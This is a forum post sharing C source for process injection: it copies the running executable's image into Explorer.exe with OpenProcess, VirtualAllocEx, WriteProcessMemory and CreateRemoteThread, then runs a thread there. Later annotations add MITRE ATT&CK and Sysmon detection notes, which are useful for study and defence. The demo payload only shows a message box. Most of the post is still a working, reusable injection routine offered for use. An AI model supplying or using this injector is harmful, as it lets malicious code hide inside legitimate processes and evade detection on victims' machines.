
[Source] Process Injection



Mensagem por uNreal 11/7/2020, 00:34

Process Injection
This project copies the image of the local (calling) process into another, remote process and executes it there. Your program needs no special preparation for this to work: you call the function, and the code runs inside the remote address space just as if it were in its own. You do not need to pass memory addresses to the thread, because the injected image is placed at its original address in memory, so all variables and functions it defines still work.
However, this will not work on every running process: the ImageBase required by the injector executable may already be allocated in the target process, which causes VirtualAllocEx to fail. To make this work on all processes you would first have to rebase the injector in memory and then inject it.
The default image base of an executable is, most of the time, 0x400000, which is available in Explorer.exe, so that process was chosen as the example.


inject.h
Código:
/* Injection Prototypes */
#include <windows.h>

/*
 * InjectExecutable - copy the calling executable's in-memory image into the
 * process identified by dwPid and start a thread there.
 *
 * dwPid       : process id of the target process.
 * lpStartProc : address the remote thread starts at; it is passed through
 *               unchanged, so it is an address inside the calling image.
 * lpParam     : argument handed to the remote thread.
 *
 * Returns FALSE when the target cannot be opened or the remote allocation
 * fails, TRUE otherwise.
 *
 * Defender context: this is the OpenProcess / VirtualAllocEx /
 * WriteProcessMemory / CreateRemoteThread pattern catalogued as MITRE ATT&CK
 * T1055.002 (Portable Executable Injection).
 */
BOOL InjectExecutable(DWORD dwPid, LPTHREAD_START_ROUTINE lpStartProc, LPVOID lpParam);
inject.h
Código:
#include "inject.h"
/*
 * InjectExecutable - copy this executable's mapped image into the process
 * dwPid at the same virtual address and start a remote thread at lpStartProc.
 *
 * NOTE(review): the listing heading repeats "inject.h"; this is the function
 * definition, so it presumably belongs in a separate .c file.
 *
 * dwPid       : process id of the target process.
 * lpStartProc : thread start address, used unchanged in the target; this only
 *               makes sense because the image is written to the same base
 *               address it occupies locally.
 * lpParam     : argument handed to the remote thread.
 *
 * Returns FALSE if OpenProcess or VirtualAllocEx fails. Returns TRUE in every
 * other case: the results of WriteProcessMemory and CreateRemoteThread are
 * not checked, so TRUE does not prove that anything ran in the target.
 * hProcess and the thread handle are never closed on any path.
 *
 * Defender context (MITRE ATT&CK T1055.002, Portable Executable Injection):
 * the call sequence below is directly observable. A full-access cross-process
 * handle request shows up in process-access auditing (e.g. Sysmon Event ID
 * 10), the remote thread in Sysmon Event ID 8 (CreateRemoteThread), and the
 * result is a private, committed PAGE_EXECUTE_READWRITE region that holds a
 * PE image but is not backed by a file on disk, which memory scanners look
 * for.
 */
BOOL InjectExecutable(DWORD dwPid, LPTHREAD_START_ROUTINE lpStartProc, LPVOID lpParam)
{
 HMODULE hModule, hNewModule;
 DWORD dwSize;
 HANDLE hProcess;
 IMAGE_DOS_HEADER ImageDosHeader;
 /* The optional header is read in its 32-bit layout, so the code assumes the
    calling image is a PE32 (32-bit) executable. */
 IMAGE_OPTIONAL_HEADER32 ImageOptionalHeader;
 /* Requests every access right on the target process. */
 hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);

 if (hProcess == NULL)
 {
 return FALSE;
 }
 /* NULL asks for the module handle of the calling executable itself; the
    handle is used below as the base address of the mapped image. */
 hModule = GetModuleHandle(NULL);
 /* Read the DOS header from the start of the image to obtain e_lfanew, the
    offset of the PE signature. */
 CopyMemory(&ImageDosHeader, hModule, sizeof(ImageDosHeader));
 /* Optional header = base + e_lfanew + 4-byte PE signature (sizeof(DWORD))
    + IMAGE_FILE_HEADER. No signature or magic value is validated. */
 CopyMemory(&ImageOptionalHeader, ((BYTE *)hModule + sizeof(DWORD) + ImageDosHeader.e_lfanew + sizeof(IMAGE_FILE_HEADER)), sizeof(ImageOptionalHeader));
 /* SizeOfImage is the size of the whole image as mapped in memory. */
 dwSize = ImageOptionalHeader.SizeOfImage;

 /* Ask for memory in the target at the SAME address as the local image base.
    No relocation is applied anywhere in this function, so the call fails if
    that range is already in use in the target. The region is requested
    readable, writable and executable at once. */
 hNewModule = VirtualAllocEx(hProcess, hModule, dwSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

 if (hNewModule == NULL)
 {
 return FALSE;
 }

 /* Copy the local image byte for byte into the target; the return value and
    the number of bytes written are ignored. */
 WriteProcessMemory(hProcess, hNewModule, hModule, dwSize, NULL);
 /* Start a thread in the target at lpStartProc with default security
    attributes and stack size; the returned handle is discarded. */
 CreateRemoteThread(hProcess, 0, 0, lpStartProc, lpParam, 0, NULL);
 return TRUE;

}
example.c
Código:
#include "inject.h"
/* Forward declaration of the thread routine defined below, so its address can
   be passed to InjectExecutable. */
DWORD WINAPI RemFunc(LPVOID lpParam);
/*
 * WinMainCRTStartup - entry point of the example program.
 *
 * Looks up a top-level window of class "ProgMan", takes the id of the process
 * that owns it, and calls InjectExecutable with RemFunc as the remote thread
 * routine and no argument. The accompanying text names Explorer.exe as the
 * intended target.
 *
 * NOTE(review): the function is named like the C runtime's GUI startup
 * routine, so the program is presumably linked without the CRT - confirm
 * against the build settings.
 *
 * None of the three calls is checked. If no matching window exists, dwPid is
 * passed on uninitialised; the result of InjectExecutable is discarded.
 */
void WinMainCRTStartup()
{
 DWORD dwPid;
 /* The thread id returned by GetWindowThreadProcessId is ignored; only the
    process id written to dwPid is used. */
 GetWindowThreadProcessId(FindWindow("ProgMan", NULL), &dwPid);
 InjectExecutable(dwPid, &RemFunc, NULL);
}

/*
 * RemFunc - thread routine handed to InjectExecutable by the example; it is
 * the code that runs as the remote thread in the target process.
 *
 * lpParam : unused (the example passes NULL).
 *
 * Shows a message box with the caption "Explorer" and then ends the thread.
 * For an analyst, the visible effect is a dialog raised by a thread of the
 * target process rather than by the example program.
 */
DWORD WINAPI RemFunc(LPVOID lpParam)
{
 /* NOTE(review): the lone 'n' after "!!!!" and after "ProcessInjection" looks
    like a "\n" escape whose backslash was lost when the page was rendered -
    confirm against the original source. */
 MessageBox(HWND_DESKTOP, "Greetings from the Hijacked Process!!!!nDone with ProcessInjectionn.::ANUBIS::.", "Explorer", MB_OK);
 /* Ends only this thread; the return statement after it is never reached. */
 ExitThread(0);
 return 0;
}


Última edição por uNreal em 11/7/2020, 00:37, editado 1 vez(es) (Motivo da edição : Add Crédit:ANUBIS)